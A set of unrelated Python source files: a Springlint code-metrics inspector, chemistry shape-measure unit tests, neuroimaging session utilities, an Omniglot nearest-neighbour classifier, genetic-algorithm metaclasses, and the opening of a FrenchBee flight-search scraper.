'rfc': 'class_response',
'nom': 'method_number'
}
metric_name_to_description = {
'dit': get_inheritance_depth_tip(),
'noc': get_child_number_tip(),
'wmc': get_weighted_method_tip(),
'cbo': get_class_coupling_tip(),
'lcom': get_cohesion_tip(),
'rfc': get_class_response_tip(),
'nom': get_method_number_tip()
}
metric_name_to_issue_type = {
'dit': IssueType.INHERITANCE_DEPTH,
'noc': IssueType.CHILDREN_NUMBER,
'wmc': IssueType.WEIGHTED_METHOD,
'cbo': IssueType.COUPLING,
'lcom': IssueType.COHESION,
'rfc': IssueType.CLASS_RESPONSE,
'nom': IssueType.METHOD_NUMBER
}
@classmethod
def _create_command(cls, path: Path, output_path: Path) -> List[str]:
return [
'java', '-jar',
PATH_SPRINGLINT_JAR,
'--output', str(output_path),
'-otype', 'html',
'--project', str(path)
]
def inspect(self, path: Path, config: dict) -> List[BaseIssue]:
with new_temp_dir() as temp_dir:
if path.is_file():
return self._inspect_file(path, temp_dir)
else:
return self._inspect_project(path, temp_dir)
@classmethod
def _inspect_project(cls, path: Path, temp_dir: Path) -> List[BaseIssue]:
output_path = temp_dir / SPRINGLINT_OUTPUT_NAME
command = cls._create_command(path, temp_dir)
run_in_subprocess(command)
return cls._parse(output_path)
@classmethod
def _inspect_file(cls, path: Path, temp_dir: Path) -> List[BaseIssue]:
output_path = temp_dir / SPRINGLINT_OUTPUT_NAME
copy(str(path), str(temp_dir))
command = cls._create_command(temp_dir, temp_dir)
run_in_subprocess(command)
return cls._parse(output_path, str(path))
@classmethod
def _parse(cls, output_path: Path, origin_path: str = '') -> List[BaseIssue]:
if not output_path.is_file():
logger.error('%s: error - no output file' % cls.inspector_type.value)
return []
with open(str(output_path)) as out_file:
file_content = out_file.read()
issues: List[BaseIssue] = cls._parse_smells(file_content, origin_path)
issues.extend(cls._parse_metrics(file_content, origin_path))
return issues
@classmethod
def _parse_smells(cls, file_content: AnyStr, origin_path: str = '') -> List[BaseIssue]:
smells_re = re.compile(r'var smells=([^;]*);', re.S)
smells_string = smells_re.findall(file_content)[0]
smells = json.JSONDecoder().decode(smells_string)
issues: List[BaseIssue] = []
for file_smell in smells:
if origin_path:
file_path = origin_path
else:
file_path = file_smell['file']
issues.extend([CodeIssue(
file_path=Path(file_path),
line_no=1,
column_no=1,
origin_class=smell['name'],
inspector_type=cls.inspector_type,
type=IssueType.ARCHITECTURE,
description=smell['description']
) for smell in file_smell['smells']])
return issues
@classmethod
def _parse_metrics(cls, file_content: AnyStr, origin_path: str = '') -> List[BaseIssue]:
metrics_re = re.compile(r'var classes =([^;]*);', re.S)
metrics_string = metrics_re.findall(file_content)[0]
type_metrics_list = json.loads(metrics_string).items()
issues: List[BaseIssue] = []
for metrics_list in type_metrics_list:
for metrics in metrics_list[1]:
for metric_name in metrics:
if metric_name not in cls.metric_name_to_property:
continue
if origin_path:
file_path = origin_path
else:
file_path = metrics['file']
issues.append(cls._create_issue(metric_name,
metrics[metric_name],
Path(file_path)))
return issues
@classmethod
def _create_issue(cls, metric_name: str,
metric_value: int, path: Path) -> Optional[BaseIssue]:
property_name = cls.metric_name_to_property[metric_name]
issue_data = cls._get_common_issue_data(path)
issue_data[property_name] = metric_value
issue_data['description'] = cls.metric_name_to_description[metric_name]
issue_data['type'] = cls.metric_name_to_issue_type[metric_name]
if metric_name == 'dit':
return InheritanceIssue(**issue_data)
if metric_name == 'noc':
return ChildrenNumberIssue(**issue_data)
if metric_name == 'wmc':
return WeightedMethodIssue(**issue_data)
if metric_name == 'cbo':
return CouplingIssue(**issue_data)
if metric_name == 'lcom':
return CohesionIssue(**issue_data)
if metric_name == 'rfc':
return ClassResponseIssue(**issue_data)
if metric_name == 'nom':
return MethodNumberIssue(**issue_data)
return None
@classmethod
def _get_common_issue_data(cls, file: Path) -> Dict[str, Any]:
return IssueData.get_base_issue_data_dict(file, cls.inspector_type)
|
<filename>tests/test_shape.py
import unittest
import numpy as np
from cosymlib import Cosymlib
from cosymlib.file_io import classic_inputs
from cosymlib import file_io
import cosymlib.shape as shape
import cosymlib.shape.maps as maps
import os
data_dir = os.path.join(os.path.dirname(__file__), 'data')
class TestShape(unittest.TestCase):
def test_example01(self):
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example01.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).measure(reference_polyhedron[0], central_atom=options['%central_atom'])
for molecule in molecules],
[shape.Shape(molecule).measure(reference_polyhedron[1], central_atom=options['%central_atom'])
for molecule in molecules]]
calculated_results = np.column_stack((results[0], results[1]))
nice_measures = [[31.375, 0.97], [33.44, 0.16]]
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-3))
def test_example02(self):
nice_measures = [[5.271, 36.847],
[5.184, 36.789],
[5.047, 36.698],
[5.234, 36.822],
[5.1, 36.733]]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example02.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).measure(reference_polyhedron[0], options['%central_atom'])
for molecule in molecules],
[shape.Shape(molecule).measure(reference_polyhedron[1], options['%central_atom'])
for molecule in molecules]]
calculated_results = np.column_stack((results[0], results[1]))
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-3))
def test_example03(self):
nice_measures = [[31.375, 0.97],
[33.44, 0.16]]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example03.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = []
for reference in reference_polyhedron:
results.append([shape.Shape(molecule).measure(reference, central_atom=options['%central_atom'])
for molecule in molecules])
calculated_results = np.column_stack((results[0], results[1]))
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-3))
def test_example04(self):
nice_measures = [[31.375, 0.97],
[33.44, 0.16]]
nice_structures = [[2.63702000e+00, 9.00254000e+00, 1.50230800e+01],
[4.04611899e+00, 8.76816018e+00, 1.39529277e+01],
[2.90730181e+00, 8.13748396e+00, 1.65607229e+01],
[1.17328859e+00, 8.36062228e+00, 1.42286293e+01],
[2.42137060e+00, 1.07438936e+01, 1.53500401e+01],
[-3.47837193e-17, -9.20929468e-18, 2.51183874e-17],
[3.77908106e-01, 9.50150647e-01, -8.46343078e-01],
[-3.77908106e-01, -9.50150647e-01, 8.46343078e-01],
[-1.14966271e+00, 6.33326997e-01, 1.97661211e-01],
[1.14966271e+00, -6.33326997e-01, -1.97661211e-01],
[2.63702000e+00, 9.00254000e+00, 1.50230800e+01],
[3.76728743e+00, 7.46687014e+00, 1.40425715e+01],
[4.02414490e+00, 8.97967996e+00, 1.66578721e+01],
[1.24989510e+00, 9.02540004e+00, 1.33882879e+01],
[1.50675257e+00, 1.05382099e+01, 1.60035885e+01],
[9.74091060e-17, 1.01739088e-17, -5.98080786e-17],
[5.66862241e-01, 1.42522607e+00, -1.26951447e+00],
[-5.66862241e-01, -1.42522607e+00, 1.26951447e+00],
[-1.72449417e+00, 9.49990377e-01, 2.96491640e-01],
[1.72449417e+00, -9.49990377e-01, -2.96491640e-01]]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example04.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).structure(reference_polyhedron[0], central_atom=options['%central_atom'])
for molecule in molecules]]
calculated_results = np.concatenate((results[0][0], results[0][1]))
results.append([shape.Shape(molecule).structure(reference_polyhedron[1], central_atom=options['%central_atom'])
for molecule in molecules])
calculated_results = np.concatenate((calculated_results, np.concatenate((results[1][0], results[1][1]))))
results = []
results.append([shape.Shape(molecule).measure(reference_polyhedron[0], central_atom=options['%central_atom'])
for molecule in molecules])
results.append([shape.Shape(molecule).measure(reference_polyhedron[1], central_atom=options['%central_atom'])
for molecule in molecules])
calculated_results = [calculated_results, np.column_stack((results[0], results[1]))]
self.assertTrue(np.allclose(nice_structures, calculated_results[0], atol=1e-3))
self.assertTrue(np.allclose(nice_measures, calculated_results[1], atol=1e-3))
def test_example05(self):
nice_gen_coord = [84., 84., 25.4, 79.1, 23.7, 25., 54.6]
nice_measures = [[12.011, 0.954], [12.012, 0.957], [1.142, 11.245], [10.707, 1.236], [0.993, 12.826],
[1.105, 11.783], [5.203, 5.085]]
nice_dev_path = [7.2, 7.2, 6.5, 5.5, 10.6, 8.1, 8.6]
nice_path_coordinates = np.array([[0., 16.737],
[0.035, 15.355],
[0.144, 14.002],
[0.329, 12.681],
[0.593, 11.398],
[0.94, 10.158],
[1.371, 8.966],
[1.89, 7.828],
[2.497, 6.748],
[3.195, 5.732],
[3.984, 4.785],
[4.865, 3.911],
[5.837, 3.116],
[6.901, 2.403],
[8.055, 1.777],
[9.298, 1.241],
[10.626, 0.798],
[12.038, 0.45],
[13.53, 0.201],
[15.097, 0.05],
[16.737, 0.]])
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example05.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).measure(reference_polyhedron[0], central_atom=options['%central_atom'])
for molecule in molecules],
[shape.Shape(molecule).measure(reference_polyhedron[1], central_atom=options['%central_atom'])
for molecule in molecules]]
dev_path = [molecule.get_path_deviation(reference_polyhedron[0], reference_polyhedron[1],
central_atom=options['%central_atom'])
for molecule in molecules]
gen_coord = [molecule.get_generalized_coordinate(reference_polyhedron[0], reference_polyhedron[1],
central_atom=options['%central_atom'])
for molecule in molecules]
map = maps.get_shape_map(reference_polyhedron[0], reference_polyhedron[1], num_points=20)
self.assertTrue(np.allclose(nice_gen_coord, gen_coord, atol=1e-1))
calculated_results = np.column_stack((results[0], results[1]))
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-1))
self.assertTrue(np.allclose(nice_dev_path, dev_path, atol=1e-1))
self.assertTrue(np.allclose(nice_path_coordinates.T, map[:2], atol=1e-1))
def test_example06(self):
nice_dev_path = [0.9, 3.7, 4.1, 3.7, 3.1, 0.1, 0.7, 3.9, 4., 1.7, 1.9, 2.6, 1.4,
2.1, 1.5, 1.4, 4.3, 3.4, 1.1, 0.9, 1.6, 1.6, 0.1, 1.5, 2.5, 0.2,
0.6, 3.1, 1.6, 1.1, 0.5, 1.1, 0.5, 1.6, 0.3, 4.8, 3.4, 3., 4.4,
0.6, 0.8, 1., 0.6, 2.8, 3.3, 0.5, 0.6, 2.1, 3.5, 2.6, 4.7, 0.6,
0.7, 0.8, 4., 4.8, 1.3, 1.5, 1.3, 0.9, 2.2, 2.5, 4.6, 4.7, 4.7,
2.4, 0.8, 0., 1.3, 1.4, 1.4, 0.5, 1.7, 3.4, 4., 2.2, 0.4, 0.,
1.5, 1.8, 1., 4.5, 1.5, 1.5, 1.6, 0.7, 0.6, 2.3, 0.3, 0.2, 0.3,
4.2, 0.2, 0.4, 0.9, 0.3, 0.4, 0., 3.2, 1.4, 1.8, 1., 1.3, 0.6,
2., 0.3, 0., 0.1, 0.6, 2.1, 4.2, 1.6, 2.8, 1.5, 2.6, 2.8, 1.7,
0.3, 0.7, 0.5, 0.6, 0.6, 2.5, 1.5, 0.8, 0.3, 0.2, 0.8, 0.7, 3.6,
3.8, 4.5, 2.8, 1.5, 3.8, 1.8, 3.9, 1.5, 0.2, 0.4, 0.8, 2.5, 0.5,
2.6, 1.3, 0.8, 1.2, 1.9, 3.9, 2.4, 0.9, 0.4, 2.6, 0., 2.4, 1.7,
4.4, 1.6, 3.5, 3.8, 3.6, 4.7, 4.8, 3.7, 1.8, 1.6, 2.3, 3.7, 3.,
1.3, 0.9, 2.8, 0.9, 4.1, 3.2, 4.6, 1.7, 0.8, 1., 0.7, 0.6, 0.2,
4.6, 1.5, 1.5, 1.7, 2.5, 2.9, 0.5, 0.8, 1.3]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example06.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
symobj = Cosymlib(molecules)
shape_measure, devpath, get_coord = symobj.get_path_parameters(reference_polyhedron[0], reference_polyhedron[1],
central_atom=options['%central_atom'])
filter_mask = [dv < 5.0 and gc < 101 for dv, gc in zip(devpath, get_coord)]
devpath = np.array(devpath)[filter_mask]
self.assertTrue(np.allclose(nice_dev_path, devpath, atol=1e-1))
def test_example07(self):
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example06.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
symobj = Cosymlib(molecules)
shape_measure, devpath, get_coord = symobj.get_path_parameters(reference_polyhedron[0], reference_polyhedron[1],
central_atom=options['%central_atom'])
filter_mask = [dv < 5.0 and 40 < gc < 60 for dv, gc in zip(devpath, get_coord)]
devpath = np.array(devpath)[filter_mask]
self.assertTrue(np.allclose(0.2, devpath, atol=1e-1))
def test_example08(self):
nice_measures = [[1.976, 3.699],
[6.955, 0.602]]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example08.dat')
central_atom = options['%central_atom']
reference_polyhedron = []
if options['%labels'] != 0:
for number in options['%labels']:
if int(number) == 0:
for ref in file_io.get_geometry_from_file_ref(data_dir + '/shape/example08.ref', read_multiple=True):
reference_polyhedron.append(ref)
else:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).measure(reference_polyhedron[0], central_atom=central_atom)
for molecule in molecules], [shape.Shape(molecule).measure(reference_polyhedron[1],
central_atom=central_atom) for molecule
in molecules]]
calculated_results = np.column_stack((results[0], results[1]))
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-2))
# De l'exemple 9-12 tots necessiten la comanda fixperm que no esta inclosa encara en el programa
# def test_example09(self):
# # fixperm
# pass
# def test_example13(self):
#
# central_atom = 1
# ref_str1 = shape.shape_tools.get_test_structure('EP-9', central_atom)
# ref_str1 = shape.shape_tools.order_coordinates(ref_str1, [len(ref_str1), central_atom])
# ref_str2 = shape.shape_tools.get_test_structure('CSAPR-9', central_atom)
# ref_str2 = shape.shape_tools.order_coordinates(ref_str2, [len(ref_str2), central_atom])
# good_results = np.loadtxt(data_dir + '/shape/example09_results')
# self.assertTrue(np.allclose(good_results, ref_str1, atol=1e-3))
|
# coding: utf8
from copy import copy
import numpy as np
import pandas as pd
from os import path
def neighbour_session(session, session_list, neighbour):
if session not in session_list:
temp_list = session_list + [session]
temp_list.sort()
else:
temp_list = copy(session_list)
temp_list.sort()
index_session = temp_list.index(session)
if index_session + neighbour < 0 or index_session + neighbour >= len(temp_list):
return None
else:
if temp_list[index_session + neighbour] < 10:
return 'ses-M0' + str(temp_list[index_session + neighbour])
else:
return 'ses-M' + str(temp_list[index_session + neighbour])
def after_end_screening(session, session_list):
if session in session_list:
return False
else:
temp_list = session_list + [session]
temp_list.sort()
index_session = temp_list.index(session)
return index_session == len(temp_list) - 1
def last_session(session_list):
temp_list = copy(session_list)
temp_list.sort()
if temp_list[-1] < 10:
return 'ses-M0' + str(temp_list[-1])
else:
return 'ses-M' + str(temp_list[-1])
def complementary_list(total_list, sub_list):
result_list = []
for element in total_list:
if element not in sub_list:
result_list.append(element)
return result_list
def first_session(subject_df):
session_list = [int(session[5:]) for _, session in subject_df.index.values]
session_list.sort()
first_session = session_list[0]
if first_session < 10:
return 'ses-M0' + str(first_session)
else:
return 'ses-M' + str(first_session)
def next_session(subject_df, session_orig):
session_list = [int(session[5:]) for _, session in subject_df.index.values]
session_list.sort()
session_id_list = []
for session in session_list:
if session < 10:
session_id_list.append('ses-M0' + str(session))
else:
session_id_list.append('ses-M' + str(session))
index = session_id_list.index(session_orig)
if index < len(session_id_list) - 1:
return session_id_list[index + 1]
else:
raise ValueError('The argument session is the last session')
def extract_baseline(diagnosis_df, diagnosis, set_index=True):
from copy import deepcopy
if set_index:
all_df = diagnosis_df.set_index(['participant_id', 'session_id'])
else:
all_df = deepcopy(diagnosis_df)
result_df = pd.DataFrame()
for subject, subject_df in all_df.groupby(level=0):
baseline = first_session(subject_df)
subject_baseline_df = pd.DataFrame(data=[[subject, baseline] +
subject_df.loc[(subject, baseline)].tolist()],
columns=["participant_id", "session_id"] + subject_df.columns.values.tolist())
result_df = pd.concat([result_df, subject_baseline_df])
result_df["diagnosis"] = [diagnosis] * len(result_df)
result_df.reset_index(inplace=True, drop=True)
return result_df
def chi2(x_test, x_train):
from scipy.stats import chisquare
# Look for chi2 computation
total_categories = np.concatenate([x_test, x_train])
unique_categories = np.unique(total_categories)
f_obs = [(x_test == category).sum() / len(x_test) for category in unique_categories]
f_exp = [(x_train == category).sum() / len(x_train) for category in unique_categories]
T, p = chisquare(f_obs, f_exp)
return T, p
def add_demographics(df, demographics_df, diagnosis):
out_df = pd.DataFrame()
tmp_demo_df = copy(demographics_df)
tmp_demo_df.reset_index(inplace=True)
for idx in df.index.values:
participant = df.loc[idx, "participant_id"]
session = df.loc[idx, "session_id"]
row_df = tmp_demo_df[(tmp_demo_df.participant_id == participant) & (tmp_demo_df.session_id == session)]
out_df = pd.concat([out_df, row_df])
out_df.reset_index(inplace=True, drop=True)
out_df.diagnosis = [diagnosis] * len(out_df)
return out_df
def remove_unicity(values_list):
"""Count the values of each class and label all the classes with only one label under the same label."""
unique_classes, counts = np.unique(values_list, return_counts=True)
one_sub_classes = unique_classes[(counts == 1)]
for class_element in one_sub_classes:
values_list[values_list.index(class_element)] = unique_classes.min()
return values_list
def category_conversion(values_list):
values_np = np.array(values_list)
unique_classes = np.unique(values_np)
for index, unique_class in enumerate(unique_classes):
values_np[values_np == unique_class] = index + 1
return values_np.astype(int).tolist()
def find_label(labels_list, target_label):
if target_label in labels_list:
return target_label
else:
min_length = np.inf
found_label = None
for label in labels_list:
if target_label.lower() in label.lower() and min_length > len(label):
min_length = len(label)
found_label = label
if found_label is None:
raise ValueError(f"No label was found in {labels_list} for target label {target_label}.")
return found_label
def retrieve_longitudinal(df, diagnosis_df):
final_df = pd.DataFrame()
for idx in df.index.values:
subject = df.loc[idx, 'participant_id']
row_df = diagnosis_df[diagnosis_df.participant_id == subject]
final_df = pd.concat([final_df, row_df])
return final_df
def remove_sub_labels(diagnosis_df, sub_labels, diagnosis_df_paths, results_path,
logger=None):
from ..deep_learning.iotools import return_logger
if logger is None:
logger = return_logger(2, "remove sub labels")
supplementary_diagnoses = []
logger.debug('Before subjects removal')
sub_df = diagnosis_df.reset_index().groupby('participant_id')['session_id'].nunique()
logger.debug(f'{len(sub_df)} subjects, {len(diagnosis_df)} scans')
for label in sub_labels:
if f'{label}.tsv' in diagnosis_df_paths:
sub_diag_df = pd.read_csv(path.join(results_path, f'{label}.tsv'), sep='\t')
sub_diag_baseline_df = extract_baseline(sub_diag_df, label)
for idx in sub_diag_baseline_df.index.values:
subject = sub_diag_baseline_df.loc[idx, 'participant_id']
diagnosis_df.drop(subject, inplace=True, level=0)
supplementary_diagnoses.append(label)
logger.debug(f'Removed {len(sub_diag_baseline_df)} subjects based on {label} label')
sub_df = diagnosis_df.reset_index().groupby('participant_id')['session_id'].nunique()
logger.debug(f'{len(sub_df)} subjects, {len(diagnosis_df)} scans')
return diagnosis_df, supplementary_diagnoses
|
<filename>classifiers/nearest_neighbor.py
import os
from argparse import ArgumentParser
from random import choice, seed
from heapq import nlargest
from typing import Callable
from aenum import NamedTuple
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
from torch.nn import CosineSimilarity
from torchvision.datasets import Omniglot
from torchvision import transforms
from tqdm import tqdm
from data.full_omniglot import FullOmniglot
from data.dataset import OmniglotReactionTimeDataset
from helpers.stratified_sampler import StratifiedKFoldSampler
# Constants:
MIN_NEIGHBORS: int = 1
MAX_NEIGHBORS: int = 32639
RESIZED_SIZE: list = [28, 28]
# NamedTuples:
LabeledScore: NamedTuple = NamedTuple("LabeledScore", "score label")
def get_nearest_neighbor(nearest_labels: list) -> int:
label_frequencies: dict = {}
for (score, label) in nearest_labels:
if not label_frequencies.get(label):
label_frequencies[label] += 1
frequency_labels: dict = {frequency: [] for frequency in label_frequencies.values()}
for label, frequency in label_frequencies.items():
frequency_labels[frequency].append(label)
maximum_frequency: int = max([frequency for frequency in frequency_labels.keys()])
# If we have a tie, we choose a label randomly. Otherwise, we have the winning label.
if len(frequency_labels[maximum_frequency]) > 1:
winning_label: int = choice(frequency_labels[maximum_frequency])
else:
winning_label: int = frequency_labels[maximum_frequency][0]
return winning_label
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("k", type=int, choices=range(MIN_NEIGHBORS, MAX_NEIGHBORS))
parser.add_argument("split", type=float)
parser.add_argument("--data_source", type=str, choices=["full", "background", "evaluation", "reaction-time"],
default="reaction-time")
parser.add_argument("--distance-type", type=str, choices=["cosine"], default="cosine")
parser.add_argument("--seed", type=int)
parser.add_argument("--split-type", type=str, choices=["random", "stratified"], default="random")
parser.add_argument("--transforms", type=str, choices=["raw", "resized"]) # TODO: make multi-arg
args = parser.parse_args()
# TODO: investigate subparsers?
if args.seed:
if args.seed >= 0:
seed(args.seed)
else:
raise ValueError("Invalid seed. Please try again.")
# We perform data validation for various options here:
if args.distance_type == "cosine":
distance_function: Callable = CosineSimilarity(dim=0)
else:
raise ValueError("Invalid distance type given. Please try again.")
if args.split_type == "random":
if args.split <= 0.0 or args.split >= 1.0:
raise ValueError("Invalid split percentage. Please provide a value within the range of (0, 1).")
elif args.split_type == "stratified":
if not args.split.is_integer() or args.split <= 1:
raise ValueError("Invalid number of folds. Please provide a value greater than one "
"and smaller than the data size.")
# Retrieve data from dataset:
transforms_list: list = [transforms.ToTensor()]
if args.transforms == "resized":
transforms_list.append(transforms.Resize(RESIZED_SIZE))
if args.transforms == "flattened":
transforms_list.append(lambda t: t.flatten)
transform = transforms.Compose(transforms_list)
if args.data_source == "full":
dataset = FullOmniglot(os.getcwd(), transform=transform)
elif args.data_source == "background":
dataset = Omniglot(os.getcwd(), transform=transform)
elif args.data_source == "evaluation":
dataset = Omniglot(os.getcwd(), background=False, transform=transform)
elif args.data_source == "reaction-time":
dataset = OmniglotReactionTimeDataset('../sigma_dataset.csv', transforms=transform)
else:
raise ValueError("Appropriate dataset not specified. Please try again with one of the possible options.")
# We divide up the data into its component parts.
# Then, we name some set as the test set and perform the algorithm.
# Finally, we determine how well the algorithm did.
if args.split_type == "stratified":
folds = [fold for fold in StratifiedKFoldSampler(dataset, int(args.split))]
training_set: list = [index for fold in folds[0:int(args.split)] for index in fold]
test_set: list = folds[-1]
ground_truth: list = []
predictions: list = []
for test_index in tqdm(test_set):
test_tensor, test_label = dataset[test_index]
ground_truth.append(test_label)
labeled_scores: list = []
for training_index in training_set:
training_tensor, training_label = dataset[training_index]
labeled_scores.append(LabeledScore(distance_function(test_tensor, training_tensor), training_label))
maximum_labeled_scores = nlargest(n=args.k, iterable=labeled_scores, key=lambda x: x.score)
predicted_label = get_nearest_neighbor(maximum_labeled_scores)
predictions.append(predicted_label)
else:
raise NotImplementedError("Random sampling has not yet been implemented for this task.")
print(ground_truth)
print("\n")
print(predictions)
# Once we have the training and the test data, we can begin the algorithm.
# In particular, we use the distance_function to compute distance between each item.
# Then, we find the nlargest items in the array. We use the majority of their classes to classify the item.
# If there is no majority, we randomize between the most frequent classes.
# TODO: this is a little simplistic. We could do multiple things here: we could take the label with the best score,
# we could take the label with the best average score from those items with the highest frequency...
# Finally, we score the results.
accuracy: float = accuracy_score(ground_truth, predictions)
precision: float = precision_score(ground_truth, predictions, average='macro')
recall: float = recall_score(ground_truth, predictions, average='macro')
f1_score: float = f1_score(ground_truth, predictions, average='macro')
print(f"Results (Seed: {args.seed}):\n"
f"\t* Accuracy: {accuracy}\n"
f"\t* Precision: {precision}\n"
f"\t* Recall: {recall}\n"
f"\t* F1 Score: {f1_score}\n")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import inspect
from functools import wraps
from ..components.individual import IndividualBase
from ..components.population import Population
from ..mpiutil import master_only
class AnalysisMeta(type):
''' Metaclass for analysis plugin class
'''
def __new__(cls, name, bases, attrs):
# Check interval type.
if 'interval' in attrs:
interval = attrs['interval']
if type(interval) is not int or interval <= 0:
raise TypeError('analysis interval must be a positive integer')
for method_name in ['setup', 'register_step', 'finalize']:
method = attrs.get(method_name, None)
if method is not None and not callable(method):
msg = "{} must be a callable object".format(method)
raise AttributeError(msg)
# Set default interface methods.
elif method is None:
if method_name == 'setup':
attrs[method_name] = lambda self, ng, engine: None
elif method_name == 'register_step':
attrs[method_name] = lambda self, g, population, engine: None
elif method_name == 'finalize':
attrs[method_name] = lambda self, population, engine: None
# Check if the plugin is only used in master process.
called_in_master = attrs['master_only'] if 'master_only' in attrs else False
# Wrap all interfaces.
if called_in_master:
for method_name in ['setup', 'register_step', 'finalize']:
attrs[method_name] = master_only(attrs[method_name])
# Set logger.
logger_name = 'gaft.{}'.format(name)
attrs['logger'] = logging.getLogger(logger_name)
return type.__new__(cls, name, bases, attrs)
class CrossoverMeta(type):
''' Metaclass for crossover operator class.
'''
def __new__(cls, name, bases, attrs):
if 'cross' not in attrs:
raise AttributeError('crossover operator class must have cross method')
if 'pc' in attrs and (attrs['pc'] <= 0.0 or attrs['pc'] > 1.0):
raise ValueError('Invalid crossover probability')
cross = attrs['cross']
# Check parameter of cross method.
sig = inspect.signature(cross)
if 'father' not in sig.parameters:
raise NameError('cross method must have father parameter')
if 'mother' not in sig.parameters:
raise NameError('cross method must have mother parameter')
# Add parameter check to user-defined method.
@wraps(cross)
def _wrapped_cross(self, father, mother):
''' Wrapper to add parameters type checking.
'''
# Check parameter types.
if not (isinstance(father, IndividualBase) and
isinstance(mother, IndividualBase)):
raise TypeError('father and mother\'s type must be subclass of IndividualBase')
return cross(self, father, mother)
attrs['cross'] = _wrapped_cross
# Set logger.
logger_name = 'gaft.{}'.format(name)
attrs['logger'] = logging.getLogger(logger_name)
return type.__new__(cls, name, bases, attrs)
class MutationMeta(type):
''' Metaclass for mutation operator class.
'''
def __new__(cls, name, bases, attrs):
if 'mutate' not in attrs:
raise AttributeError('mutation operator class must have mutate method')
if 'pm' in attrs and (attrs['pm'] <= 0.0 or attrs['pm'] > 1.0):
raise ValueError('Invalid mutation probability')
mutate = attrs['mutate']
# Check parameters of mutate method.
sig = inspect.signature(mutate)
if 'individual' not in sig.parameters:
raise NameError('mutate method must have individual parameter')
# Add parameter check to user-defined method.
@wraps(mutate)
def _wrapped_mutate(self, individual, engine):
''' Wrapper to add parameters type checking.
'''
# Check parameter types.
if not isinstance(individual, IndividualBase):
raise TypeError('individual\' type must be subclass of IndividualBase')
return mutate(self, individual, engine)
attrs['mutate'] = _wrapped_mutate
# Set logger.
logger_name = 'gaft.{}'.format(name)
attrs['logger'] = logging.getLogger(logger_name)
return type.__new__(cls, name, bases, attrs)
class SelectionMeta(type):
''' Metaclass for selection operator class.
'''
def __new__(cls, name, bases, attrs):
# Check select method.
if 'select' not in attrs:
raise AttributeError('selection operator class must have select method')
select = attrs['select']
# Check select arguments.
sig = inspect.signature(select)
if 'population' not in sig.parameters:
raise NameError('select method must have population parameter')
if 'fitness' not in sig.parameters:
raise NameError('select method must have fitness parameter')
# Add parameter check to user-defined method.
@wraps(select)
def _wrapped_select(self, population, fitness):
''' Wrapper to add parameters type checking.
'''
# Check parameter types.
if not isinstance(population, Population):
raise TypeError('population must be Population object')
if not callable(fitness):
raise TypeError('fitness must be a callable object')
return select(self, population, fitness)
attrs['select'] = _wrapped_select
# Set logger.
logger_name = 'gaft.{}'.format(name)
attrs['logger'] = logging.getLogger(logger_name)
return type.__new__(cls, name, bases, attrs)
|
<gh_stars>0
from dataclasses import dataclass
from datetime import datetime
import json
from requests import Session, Response
from typing import Any, Iterable, List, Tuple, Union, Dict
import re
import html
import jsonpath_ng as jsonpath
from .reese84 import FrenchBeeReese84
from .models import Location, PassengerInfo, Flight, DateAndLocation, Segment, Trip
@dataclass
class FrenchBeeResponse:
command: str
selector: str
method: str
args: List[
Union[str, dict]
] # dict(departure => [year => { month => { day => { data... }} }])
data: str
class FrenchBee:
def __init__(self) -> None:
self.session = Session()
self.session.headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
}
self.session.cookies["base_host"] = "frenchbee.com"
self.session.cookies["market_lang"] = "en"
self.session.cookies["site_origin"] = "us.frenchbee.com"
def _make_search_request(
self,
source: str,
destination: str,
passengers: PassengerInfo,
departure: datetime,
returns: datetime,
module: str,
) -> List[FrenchBeeResponse]:
url: str = "https://us.frenchbee.com/en?ajax_form=1"
departure_date: str = f"{departure:%Y-%m-%d}" if departure else ""
return_date: str = f"{returns:%Y-%m-%d}" if returns else ""
payload: Dict[str, Any] = {
"visible_newsearch_flights_travel_type": "R",
"visible_newsearch_flights_from": source,
"visible_newsearch_flights_to": destination,
"newsearch_flights_travel_type": "R",
"newsearch_flights_from": source,
"newsearch_flights_to": destination,
"newsearch_flights_departure_date": departure_date,
"newsearch_flights_return_date": return_date,
"adults-count": passengers.Adults,
"children-count": passengers.Children,
"infants-count": passengers.Infants,
"um_youth-count": 0,
"form_id": "frenchbee-amadeus-search-flights-form",
"_triggering_element_name": module,
}
response: Response = self.session.post(url, data=payload)
return [
FrenchBeeResponse(
command=resp.get("command"),
method=resp.get("method"),
selector=resp.get("selector"),
args=resp.get("args") or [],
data=resp.get("data"),
)
